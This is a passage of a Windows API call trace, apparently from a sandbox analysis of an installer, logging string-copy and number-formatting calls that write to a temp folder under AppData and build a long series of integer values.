iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.060] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.060] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.060] lstrcpynA (in: lpString1=0x42e3a1, lpString2="3318816", iMaxLength=1024 | out: lpString1="3318816") returned="3318816" [0158.060] lstrlenA (lpString="3318816") returned 7 [0158.060] lstrcpynA (in: lpString1=0x336d34, lpString2="*3318816(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)", iMaxLength=1024 | out: lpString1="*3318816(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)") returned="*3318816(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)" [0158.060] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.060] lstrcpyA (in: lpString1=0x321ba8, lpString2="3318816" | out: lpString1="3318816") returned="3318816" [0158.060] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="476") returned 3 [0158.060] lstrcpyA (in: lpString1=0x431800, lpString2="476" | out: lpString1="476") returned="476" [0158.060] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="828") returned 3 [0158.061] lstrcpyA (in: lpString1=0x430800, lpString2="828" | out: lpString1="828") returned="828" [0158.061] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.061] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.061] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.061] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.061] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.061] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.061] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.061] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.061] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1488") returned 4 [0158.061] lstrcpyA (in: lpString1=0x431000, lpString2="1488" | out: lpString1="1488") returned="1488" [0158.061] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3318816") returned 7 [0158.061] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3320304") returned 7 [0158.061] lstrcpyA (in: lpString1=0x321ba8, lpString2="3320304" | out: lpString1="3320304") returned="3320304" [0158.061] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="476") returned 3 [0158.061] lstrcpyA (in: lpString1=0x431800, lpString2="476" | out: lpString1="476") returned="476" [0158.061] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="872") returned 3 [0158.061] lstrcpyA (in: lpString1=0x430800, lpString2="872" | out: lpString1="872") returned="872" [0158.061] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.061] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.062] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.062] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.062] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.062] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.062] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.062] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.062] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="2192") returned 4 [0158.062] lstrcpyA (in: lpString1=0x431000, lpString2="2192" | out: lpString1="2192") returned="2192" [0158.062] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3320304") returned 7 [0158.062] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3322496") returned 7 [0158.062] lstrcpyA (in: lpString1=0x321ba8, lpString2="3322496" | out: lpString1="3322496") returned="3322496" [0158.062] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="716") returned 3 [0158.062] lstrcpyA (in: lpString1=0x431800, lpString2="716" | out: lpString1="716") returned="716" [0158.062] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="932") returned 3 [0158.062] lstrcpyA (in: lpString1=0x430800, lpString2="932" | out: lpString1="932") returned="932" [0158.062] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.062] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.062] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.062] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.062] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.062] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.062] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.062] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.062] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="656") returned 3 [0158.062] lstrcpyA (in: lpString1=0x431000, lpString2="656" | out: lpString1="656") returned="656" [0158.063] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3322496") returned 7 [0158.063] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3323152") returned 7 [0158.063] lstrcpyA (in: lpString1=0x321ba8, lpString2="3323152" | out: lpString1="3323152") returned="3323152" [0158.063] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="476") returned 3 [0158.063] lstrcpyA (in: lpString1=0x431800, lpString2="476" | out: lpString1="476") returned="476" [0158.063] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1008") returned 4 [0158.063] lstrcpyA (in: lpString1=0x430800, lpString2="1008" | out: lpString1="1008") returned="1008" [0158.063] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.063] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.063] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.063] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.063] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.063] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.063] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.063] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.063] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1104") returned 4 [0158.063] lstrcpyA (in: lpString1=0x431000, lpString2="1104" | out: lpString1="1104") returned="1104" [0158.063] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3323152") returned 7 [0158.063] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3324256") returned 7 [0158.063] lstrcpyA (in: lpString1=0x321ba8, lpString2="3324256" | out: lpString1="3324256") returned="3324256" [0158.064] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="476") returned 3 [0158.064] lstrcpyA (in: lpString1=0x431800, lpString2="476" | out: lpString1="476") returned="476" [0158.064] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="536") returned 3 [0158.064] lstrcpyA (in: lpString1=0x430800, lpString2="536" | out: lpString1="536") returned="536" [0158.064] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.064] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.064] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.064] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.064] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.064] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.064] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.064] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.064] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1232") returned 4 [0158.064] lstrcpyA (in: lpString1=0x431000, lpString2="1232" | out: lpString1="1232") returned="1232" [0158.064] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3324256") returned 7 [0158.064] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3325488") returned 7 [0158.064] lstrcpyA (in: lpString1=0x321ba8, lpString2="3325488" | out: lpString1="3325488") returned="3325488" [0158.064] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="476") returned 3 [0158.064] lstrcpyA (in: lpString1=0x431800, lpString2="476" | out: lpString1="476") returned="476" [0158.064] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1040") returned 4 [0158.064] lstrcpyA (in: lpString1=0x430800, lpString2="1040" | out: lpString1="1040") returned="1040" [0158.064] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.065] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.065] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.065] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.065] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.065] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.065] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.065] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.065] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1040") returned 4 [0158.065] lstrcpyA (in: lpString1=0x431000, lpString2="1040" | out: lpString1="1040") returned="1040" [0158.065] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3325488") returned 7 [0158.065] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3326528") returned 7 [0158.065] lstrcpyA (in: lpString1=0x321ba8, lpString2="3326528" | out: lpString1="3326528") returned="3326528" [0158.065] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="476") returned 3 [0158.065] lstrcpyA (in: lpString1=0x431800, lpString2="476" | out: lpString1="476") returned="476" [0158.065] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1068") returned 4 [0158.065] lstrcpyA (in: lpString1=0x430800, lpString2="1068" | out: lpString1="1068") returned="1068" [0158.065] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.065] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.065] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.065] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.065] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.065] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.065] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.066] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.066] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1488") returned 4 [0158.066] lstrcpyA (in: lpString1=0x431000, lpString2="1488" | out: lpString1="1488") returned="1488" [0158.066] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3326528") returned 7 [0158.066] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3328016") returned 7 [0158.066] lstrcpyA (in: lpString1=0x321ba8, lpString2="3328016" | out: lpString1="3328016") returned="3328016" [0158.066] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="476") returned 3 [0158.066] lstrcpyA (in: lpString1=0x431800, lpString2="476" | out: lpString1="476") returned="476" [0158.066] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1564") returned 4 [0158.066] lstrcpyA (in: lpString1=0x430800, lpString2="1564" | out: lpString1="1564") returned="1564" [0158.066] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.066] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.066] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.066] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.066] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.066] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.066] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.066] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.066] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="856") returned 3 [0158.066] lstrcpyA (in: lpString1=0x431000, lpString2="856" | out: lpString1="856") returned="856" [0158.066] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3328016") returned 7 [0158.066] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3328872") returned 7 [0158.067] lstrcpyA (in: lpString1=0x321ba8, lpString2="3328872" | out: lpString1="3328872") returned="3328872" [0158.067] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="872") returned 3 [0158.067] lstrcpyA (in: lpString1=0x431800, lpString2="872" | out: lpString1="872") returned="872" [0158.067] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1632") returned 4 [0158.067] lstrcpyA (in: lpString1=0x430800, lpString2="1632" | out: lpString1="1632") returned="1632" [0158.067] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.067] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.067] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.067] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.067] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.067] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.067] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.067] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.067] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="528") returned 3 [0158.067] lstrcpyA (in: lpString1=0x431000, lpString2="528" | out: lpString1="528") returned="528" [0158.067] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3328872") returned 7 [0158.067] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3329400") returned 7 [0158.067] lstrcpyA (in: lpString1=0x321ba8, lpString2="3329400" | out: lpString1="3329400") returned="3329400" [0158.067] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="828") returned 3 [0158.067] lstrcpyA (in: lpString1=0x431800, lpString2="828" | out: lpString1="828") returned="828" [0158.067] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1648") returned 4 [0158.068] lstrcpyA (in: lpString1=0x430800, lpString2="1648" | out: lpString1="1648") returned="1648" [0158.068] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.068] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.068] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.068] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.068] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.068] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.068] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.068] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.068] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="584") returned 3 [0158.068] lstrcpyA (in: lpString1=0x431000, lpString2="584" | out: lpString1="584") returned="584" [0158.068] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3329400") returned 7 [0158.068] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3329984") returned 7 [0158.068] lstrcpyA (in: lpString1=0x321ba8, lpString2="3329984" | out: lpString1="3329984") returned="3329984" [0158.068] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1624") returned 4 [0158.068] lstrcpyA (in: lpString1=0x431800, lpString2="1624" | out: lpString1="1624") returned="1624" [0158.068] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1664") returned 4 [0158.068] lstrcpyA (in: lpString1=0x430800, lpString2="1664" | out: lpString1="1664") returned="1664" [0158.068] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.068] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.068] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.068] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.068] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.069] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.069] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.069] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.069] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="2136") returned 4 [0158.069] lstrcpyA (in: lpString1=0x431000, lpString2="2136" | out: lpString1="2136") returned="2136" [0158.069] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3329984") returned 7 [0158.069] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3332120") returned 7 [0158.069] lstrcpyA (in: lpString1=0x321ba8, lpString2="3332120" | out: lpString1="3332120") returned="3332120" [0158.069] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="872") returned 3 [0158.069] lstrcpyA (in: lpString1=0x431800, lpString2="872" | out: lpString1="872") returned="872" [0158.069] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1748") returned 4 [0158.069] lstrcpyA (in: lpString1=0x430800, lpString2="1748" | out: lpString1="1748") returned="1748" [0158.069] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.069] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.069] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.069] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.069] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.069] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.069] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.070] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.070] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="528") returned 3 [0158.070] lstrcpyA (in: lpString1=0x431000, lpString2="528" | out: lpString1="528") returned="528" [0158.070] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3332120") returned 7 [0158.070] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3332648") returned 7 [0158.070] lstrcpyA (in: lpString1=0x321ba8, lpString2="3332648" | out: lpString1="3332648") returned="3332648" [0158.070] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="476") returned 3 [0158.070] lstrcpyA (in: lpString1=0x431800, lpString2="476" | out: lpString1="476") returned="476" [0158.070] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1192") returned 4 [0158.070] lstrcpyA (in: lpString1=0x430800, lpString2="1192" | out: lpString1="1192") returned="1192" [0158.070] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.070] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.070] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.070] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.070] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.070] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.070] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.070] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.070] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1488") returned 4 [0158.070] lstrcpyA (in: lpString1=0x431000, lpString2="1488" | out: lpString1="1488") returned="1488" [0158.070] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3332648") returned 7 [0158.070] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3334136") returned 7 [0158.071] lstrcpyA (in: lpString1=0x321ba8, lpString2="3334136" | out: lpString1="3334136") returned="3334136" [0158.071] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="476") returned 3 [0158.071] lstrcpyA (in: lpString1=0x431800, lpString2="476" | out: lpString1="476") returned="476" [0158.071] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1612") returned 4 [0158.071] lstrcpyA (in: lpString1=0x430800, lpString2="1612" | out: lpString1="1612") returned="1612" [0158.071] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.071] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.071] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.071] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.071] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.071] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.071] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.071] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.071] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="856") returned 3 [0158.071] lstrcpyA (in: lpString1=0x431000, lpString2="856" | out: lpString1="856") returned="856" [0158.071] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3334136") returned 7 [0158.071] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3334992") returned 7 [0158.074] lstrcpyA (in: lpString1=0x321ba8, lpString2="3334992" | out: lpString1="3334992") returned="3334992" [0158.074] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1664") returned 4 [0158.074] lstrcpyA (in: lpString1=0x431800, lpString2="1664" | out: lpString1="1664") returned="1664" [0158.074] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="684") returned 3 [0158.074] lstrcpyA (in: lpString1=0x430800, lpString2="684" | out: lpString1="684") returned="684" [0158.074] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.074] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.074] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.075] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.075] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.075] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.075] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.075] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.075] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="360") returned 3 [0158.075] lstrcpyA (in: lpString1=0x431000, lpString2="360" | out: lpString1="360") returned="360" [0158.075] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3334992") returned 7 [0158.075] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3335352") returned 7 [0158.075] lstrcpyA (in: lpString1=0x321ba8, lpString2="3335352" | out: lpString1="3335352") returned="3335352" [0158.075] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1664") returned 4 [0158.075] lstrcpyA (in: lpString1=0x431800, lpString2="1664" | out: lpString1="1664") returned="1664" [0158.075] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="528") returned 3 [0158.075] lstrcpyA (in: lpString1=0x430800, lpString2="528" | out: lpString1="528") returned="528" [0158.075] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.075] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.075] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.075] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.075] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.075] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.075] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.075] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.075] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="328") returned 3 [0158.076] lstrcpyA (in: lpString1=0x431000, lpString2="328" | out: lpString1="328") returned="328" [0158.076] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3335352") returned 7 [0158.076] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3335680") returned 7 [0158.076] lstrcpyA (in: lpString1=0x321ba8, lpString2="3335680" | out: lpString1="3335680") returned="3335680" [0158.076] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1664") returned 4 [0158.076] lstrcpyA (in: lpString1=0x431800, lpString2="1664" | out: lpString1="1664") returned="1664" [0158.076] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1852") returned 4 [0158.076] lstrcpyA (in: lpString1=0x430800, lpString2="1852" | out: lpString1="1852") returned="1852" [0158.076] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.076] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.076] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.076] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.076] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.076] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.076] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.076] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.076] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="352") returned 3 [0158.076] lstrcpyA (in: lpString1=0x431000, lpString2="352" | out: lpString1="352") returned="352" [0158.076] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3335680") returned 7 [0158.076] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3336032") returned 7 [0158.077] lstrcpyA (in: lpString1=0x321ba8, lpString2="3336032" | out: lpString1="3336032") returned="3336032" [0158.077] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1664") returned 4 [0158.077] lstrcpyA (in: lpString1=0x431800, lpString2="1664" | out: lpString1="1664") returned="1664" [0158.077] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1428") returned 4 [0158.077] lstrcpyA (in: 